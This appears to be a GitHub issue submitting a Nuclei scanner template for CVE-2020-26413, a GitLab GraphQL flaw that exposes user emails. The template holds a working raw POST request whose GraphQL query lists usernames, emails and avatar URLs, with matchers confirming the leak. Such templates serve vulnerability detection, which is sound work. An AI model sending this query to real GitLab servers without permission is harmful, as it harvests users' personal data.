### ISSUE TITLE
[nuclei-template] CVE-2020-26413

### ISSUE THREAD

**Issue by FanqXu** [projectdiscovery/nuclei-templates#3081]
### Template Information:

reference: 
  - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json

### Nuclei Template:

```yaml
id: CVE-2020-26413

info:
  name: GitLab information leak (CVE-2020-26413)
  author: _0xf4n9x_
  severity: low
  description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible.
  reference: https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json
  tags: exposure,leak

requests:
  - raw:
      - |
        POST /api/graphql HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Content-Type: application/json
        Content-Length: 265

        {
                    "query": "{\nusers {\nedges {\n  node {\n    username\n    email\n    avatarUrl\n    status {\n      emoji\n      message\n      messageHtml\n     }\n    }\n   }\n  }\n }",
                    "variables": null,
                    "operationName": null
                }

    redirects: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "username"
          - "email"
          - "avatarUrl"
        part: body
        condition: and

      - type: status
        status:
          - 200

```
